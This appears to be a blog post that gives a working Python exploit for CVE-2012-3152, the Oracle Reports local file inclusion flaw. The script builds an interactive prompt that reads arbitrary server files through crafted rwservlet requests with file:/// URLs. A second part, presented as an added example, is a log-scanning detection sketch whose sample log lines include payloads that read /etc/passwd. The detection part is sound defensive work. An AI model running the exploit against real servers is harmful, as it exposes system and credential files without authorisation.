This quick snippet of code exploits CVE-2012-3152, the Oracle Reports Local File Inclusion (LFI) vulnerability. To make it easier to interact with the vulnerable system, the HTTP request exploiting the LFI is wrapped in an endless loop that feels like a command prompt. Here is a good write-up on the actual vulnerability. For this script we threw in a dash of color to the shell-like output using the Python module “termcolor” – Download here.
```python
#!/usr/bin/python
import sys, urllib2                # Import the required modules for the vulnerability
from termcolor import colored      # Need to download python module "termcolor"

if len(sys.argv) != 2:             # Checks to make sure that a URL was supplied as a sys argument "<script> <URL>"
    print "Usage: "+sys.argv[0]+" <URL>"
    sys.exit(0)

URL=sys.argv[1]                    # Assigns URL variable and prints out message
print "[+] Attempting CVE-2012-3152 - Oracle Reports LFI"

while True:                        # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable
    resource=raw_input(colored("~$ ", "red"))
    req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///'+resource+'"'
    try:                           # Sets up a Try/Except block so exceptions are handled cleanly
        response=urllib2.urlopen(URL+req)   # Sends request and prints the response
        for line in response.readlines():
            print line.strip()
    except Exception as e:
        print e
```
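The request built by the script has a recognisable shape in web server logs: a call to `/reports/rwservlet` whose `URLPARAMETER` value is a `file:` URL. The following Python 3 detection sketch is an added example, not part of the original post; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line (log format is an assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/\d\.\d" (?P<status>\d{3})')
# URLPARAMETER whose value is a file: URL, with optional raw or escaped quotes.
PARAM_RE = re.compile(
    r'urlparameter\s*=\s*[\\"\']*\s*(?P<url>file:[^"\'\\+&\s]*)', re.I)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded requests are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lfi_attempts(lines):
    """Return one record per request asking rwservlet to fetch a file: URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = fully_decode(m.group("target")).partition("?")
        if not path.lower().rstrip("/").endswith("/reports/rwservlet"):
            continue
        p = PARAM_RE.search(query)
        if p:
            hits.append({"ip": m.group("ip"), "status": int(m.group("status")),
                         "url": p.group("url")})
    return hits


# Constructed sample log lines (documentation-range addresses), not real traffic.
PREFIX = ' - - [01/Jan/2014:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    '192.0.2.10' + PREFIX + '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache'
    '+JOBTYPE=rwurl+URLPARAMETER=\\"file:///etc/passwd\\" HTTP/1.1" 200 1532',
    '192.0.2.11' + PREFIX + '/reports/rwservlet?report=test.rdf+jobtype=rwurl'
    '+urlparameter=%2522file%253A%252F%252F%252Fetc%252Fhosts%2522 HTTP/1.1" 404 310',
    '198.51.100.7' + PREFIX + '/reports/rwservlet?report=sales.rdf+desformat=pdf HTTP/1.1" 200 9120',
    '198.51.100.8' + PREFIX + '/search?q=file:///etc/passwd HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```

The recorded status code helps triage: a hit answered with 200 means the servlet served the request, so the response for that entry should be reviewed first.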